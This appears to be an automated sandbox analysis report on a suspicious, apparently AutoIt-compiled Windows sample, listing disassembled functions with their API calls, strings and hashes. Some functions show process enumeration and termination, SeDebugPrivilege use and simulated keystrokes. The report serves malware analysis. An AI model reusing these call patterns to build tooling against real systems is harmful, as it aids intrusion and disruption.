                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: a1d0a7ea57e754d3710235634281e444bc678866102b60242aeb80e3436cf82a
                                          • Instruction ID: 1438bcf9fc08a965674c1008df29a52a3f6ece358e12c4bf3627c0b9a5cf55b0
                                          • Opcode Fuzzy Hash: a1d0a7ea57e754d3710235634281e444bc678866102b60242aeb80e3436cf82a
                                          • Instruction Fuzzy Hash: 6F51B570514244BFEF24AB28CC89FAE7BA8EB05720FA04515F921D63E1DF75A980DB60
                                          Function 00902B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0093C2F7
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0093C319
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0093C331
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0093C34F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0093C370
                                          • DestroyIcon.USER32(00000000), ref: 0093C37F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093C39C
                                          • DestroyIcon.USER32(?), ref: 0093C3AB
                                            • Part of subcall function 0098A4AF: DeleteObject.GDI32(00000000), ref: 0098A4E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: b7eb7b9ed8c52e056e3629377ce5629ea3986510aa48c8e6f1b931749266852c
                                          • Instruction ID: 01c4494643719457cc71c51a138d8d54404a00b433110dfd82200f9da762d1d4
                                          • Opcode Fuzzy Hash: b7eb7b9ed8c52e056e3629377ce5629ea3986510aa48c8e6f1b931749266852c
                                          • Instruction Fuzzy Hash: A6515870A10609AFDB24DF64CC49FAA7BB9EB58310F104529F952E72E0DB70ED90EB50
                                          Function 0095966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0095A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0095A84C
                                            • Part of subcall function 0095A82C: GetCurrentThreadId.KERNEL32 ref: 0095A853
                                            • Part of subcall function 0095A82C: AttachThreadInput.USER32(00000000,?,00959683,?,00000001), ref: 0095A85A
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0095968E
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009596AB
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009596AE
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 009596B7
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009596D5
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009596D8
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 009596E1
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009596F8
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009596FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: af3cf197922ffbc31a82764c8ce028b776a739cb50d59fddfa59ad41ed3c1f31
                                          • Instruction ID: 5cd984448c11c7b717759d57d0b04486c10e538afc772971087220d4d9f0d119
                                          • Opcode Fuzzy Hash: af3cf197922ffbc31a82764c8ce028b776a739cb50d59fddfa59ad41ed3c1f31
                                          • Instruction Fuzzy Hash: 0D11E1B1A24218BEF7106F61DC89F6A3B2DEB4C751F101525F744AB1A0C9F25C10EBA8
                                          Function 00958921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0095853C,00000B00,?,?), ref: 0095892A
                                          • HeapAlloc.KERNEL32(00000000,?,0095853C,00000B00,?,?), ref: 00958931
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0095853C,00000B00,?,?), ref: 00958946
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0095853C,00000B00,?,?), ref: 0095894E
                                          • DuplicateHandle.KERNEL32(00000000,?,0095853C,00000B00,?,?), ref: 00958951
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0095853C,00000B00,?,?), ref: 00958961
                                          • GetCurrentProcess.KERNEL32(0095853C,00000000,?,0095853C,00000B00,?,?), ref: 00958969
                                          • DuplicateHandle.KERNEL32(00000000,?,0095853C,00000B00,?,?), ref: 0095896C
                                          • CreateThread.KERNEL32(00000000,00000000,00958992,00000000,00000000,00000000), ref: 00958986
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 1fe3dfa25eeeda222c29edd8dae6383b94da3513cb0a3af88315f8be2988758b
                                          • Instruction ID: c5a2232f90889d482c3079d9f183ccafeae67d4a74bf2f7004eaa5a05b13706d
                                          • Opcode Fuzzy Hash: 1fe3dfa25eeeda222c29edd8dae6383b94da3513cb0a3af88315f8be2988758b
                                          • Instruction Fuzzy Hash: 5601BF75254304FFE710ABA5DC9DF677B6CEB89711F405421FA05DB291CA749810DB20
                                          Function 00979B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: a66936be8bba83c70c912a7d8216ba83a5049c95aee7e0c55cf4e8348ab9b8ef
                                          • Instruction ID: 89ee17a1dcdd412d08027e73acee620e416f25111cd25001fc95b3eb949f9626
                                          • Opcode Fuzzy Hash: a66936be8bba83c70c912a7d8216ba83a5049c95aee7e0c55cf4e8348ab9b8ef
                                          • Instruction Fuzzy Hash: 7FC19472A002199FDF10DFA8D885BAEB7F9FF88314F148469F949A7290E7709D45CB90
                                          Function 00979113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-625585964
                                          • Opcode ID: 9db40939caec6c1861caab18879f8da05f4f23b73df0d7f012074358152ae1a6
                                          • Instruction ID: 61d908a32902fa34078be493f1e861d042414c8fe4bdac932e732dd5a5e25136
                                          • Opcode Fuzzy Hash: 9db40939caec6c1861caab18879f8da05f4f23b73df0d7f012074358152ae1a6
                                          • Instruction Fuzzy Hash: AB91AF72A00219ABDF24DFA5C848FAFB7B8EF85714F10C559F519AB291D7709901CFA0
                                          Function 0097975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0095710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?,?,00957455), ref: 00957127
                                            • Part of subcall function 0095710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957142
                                            • Part of subcall function 0095710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957150
                                            • Part of subcall function 0095710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?), ref: 00957160
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00979806
                                          • _memset.LIBCMT ref: 00979813
                                          • _memset.LIBCMT ref: 00979956
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00979982
                                          • CoTaskMemFree.OLE32(?), ref: 0097998D
                                          Strings
                                          • NULL Pointer assignment, xrefs: 009799DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: bb4210be0cfd2046e0ff3115e62f183e8bce0df2f978b160da53afb839fa00ac
                                          • Instruction ID: d5d2057f1f752ab2ea6f67cc12c401e3dc0442cce9e6d6cf754c19ae17c743cb
                                          • Opcode Fuzzy Hash: bb4210be0cfd2046e0ff3115e62f183e8bce0df2f978b160da53afb839fa00ac
                                          • Instruction Fuzzy Hash: 82911771D00229EFDB10DFA5DC81ADEBBB9EF48710F108169F519A7291EB719A44CFA0
                                          Function 00986D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00986E24
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00986E38
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00986E52
                                          • _wcscat.LIBCMT ref: 00986EAD
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00986EC4
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00986EF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: f92d124fda5766628e9c59ad5cfbca8db13cd75c2594269497cb5ddaadb003a7
                                          • Instruction ID: 8ea20aec4374c799074b59498515bda275b23fa725bf22b4ad4ec74502f6980a
                                          • Opcode Fuzzy Hash: f92d124fda5766628e9c59ad5cfbca8db13cd75c2594269497cb5ddaadb003a7
                                          • Instruction Fuzzy Hash: 53419171A00348AFDB21AF64CC85BEE77A8EF48354F10052AF584AB2D2D6719D948B60
                                          Function 0097E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00963C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00963C7A
                                            • Part of subcall function 00963C55: Process32FirstW.KERNEL32(00000000,?), ref: 00963C88
                                            • Part of subcall function 00963C55: CloseHandle.KERNEL32(00000000), ref: 00963D52
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0097E9A4
                                          • GetLastError.KERNEL32 ref: 0097E9B7
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0097E9E6
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0097EA63
                                          • GetLastError.KERNEL32(00000000), ref: 0097EA6E
                                          • CloseHandle.KERNEL32(00000000), ref: 0097EAA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 87478a89df95e7770d72e658a3428cd4ea40ef27704ee7dcd76f79f8d5f7043c
                                          • Instruction ID: 1f9e0cb5290e8bd5777cf6641e1dab0316d919a3092a2dcaea308a373af8abed
                                          • Opcode Fuzzy Hash: 87478a89df95e7770d72e658a3428cd4ea40ef27704ee7dcd76f79f8d5f7043c
                                          • Instruction Fuzzy Hash: DD41AA723042009FDB14EF24CCA5F6EB7A5AF88314F04C459F9069B3D2DB74A808CB91
                                          Function 00962F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00963033
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 05ea55bf08adcbb6d1d509abfeb80f566b88a6fa58b48e5ec7126d2523445959
                                          • Instruction ID: 6705aaeaad457d14cc568add7d089a591ee0f3a2c4fba79b06c2f68ee6536e86
                                          • Opcode Fuzzy Hash: 05ea55bf08adcbb6d1d509abfeb80f566b88a6fa58b48e5ec7126d2523445959
                                          • Instruction Fuzzy Hash: 3E115C3134C347BEE7249B54EC42DAF7B9CDF19374B20406AF900A62C1DBB46F4466A0
                                          Function 009642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00964312
                                          • LoadStringW.USER32(00000000), ref: 00964319
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0096432F
                                          • LoadStringW.USER32(00000000), ref: 00964336
                                          • _wprintf.LIBCMT ref: 0096435C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0096437A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00964357
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 5a0d33b203e5cb43ffada98d0c32a05219b6ad2c8a5f2379e0c090f90ff6a900
                                          • Instruction ID: 29c5617b5678d612a9521c81b2699dad43cff64e188f267872adde0ab435ccce
                                          • Opcode Fuzzy Hash: 5a0d33b203e5cb43ffada98d0c32a05219b6ad2c8a5f2379e0c090f90ff6a900
                                          • Instruction Fuzzy Hash: A50162F390420CBFE711A7A0DE89EF7776CEB08300F0015A1BB45E6151EA795E855B71
                                          Function 0098D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • GetSystemMetrics.USER32(0000000F), ref: 0098D47C
                                          • GetSystemMetrics.USER32(0000000F), ref: 0098D49C
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0098D6D7
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0098D6F5
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0098D716
                                          • ShowWindow.USER32(00000003,00000000), ref: 0098D735
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0098D75A
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0098D77D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: 9b5ff573c7809cb5e57662430ce35819ba1161e8acaf4b93cbb5b0088ba611f8
                                          • Instruction ID: 10808a75c0f2fc6e11068a14eb53c62359f804a32e2b46d47456349dee296acc
                                          • Opcode Fuzzy Hash: 9b5ff573c7809cb5e57662430ce35819ba1161e8acaf4b93cbb5b0088ba611f8
                                          • Instruction Fuzzy Hash: 84B19B71601219EFDF14DF68C9C5BAD7BB5BF08711F088169EC489B399E734A990CB90
                                          Function 00902A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000), ref: 00902ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00902B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000), ref: 0093C21A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0093C1C7,00000004,00000000,00000000,00000000), ref: 0093C286
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: f60d5c80d9f5eb141ea11ed2dda6149c0d75d1093e008b8a4e97aea5153b25f2
                                          • Instruction ID: 7ef53f08a9019094d2043170ed001423ad6bb36606d951d5498c76817dbb2218
                                          • Opcode Fuzzy Hash: f60d5c80d9f5eb141ea11ed2dda6149c0d75d1093e008b8a4e97aea5153b25f2
                                          • Instruction Fuzzy Hash: 70412C70718A80DEDB358B688C9CB6B7B99AB85314F148C1DE057965E0CA79E881EB20
                                          Function 009670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 009670DD
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00967114
                                          • EnterCriticalSection.KERNEL32(?), ref: 00967130
                                          • _memmove.LIBCMT ref: 0096717E
                                          • _memmove.LIBCMT ref: 0096719B
                                          • LeaveCriticalSection.KERNEL32(?), ref: 009671AA
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009671BF
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 009671DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: 0836891979ccf85a700b18cc95f7eb9abc75acfad521d3af49495b52d7bad04c
                                          • Instruction ID: 303162078317dfcf1b5b2f2aa2082efe50abe943c839e25ab270435e1245ea99
                                          • Opcode Fuzzy Hash: 0836891979ccf85a700b18cc95f7eb9abc75acfad521d3af49495b52d7bad04c
                                          • Instruction Fuzzy Hash: 3A318D31904215EBCF00DFA4EC85AAEB7B8EF85710F1541B6F904AB256DB30DE54DBA0
                                          Function 009861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 009861EB
                                          • GetDC.USER32(00000000), ref: 009861F3
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009861FE
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0098620A
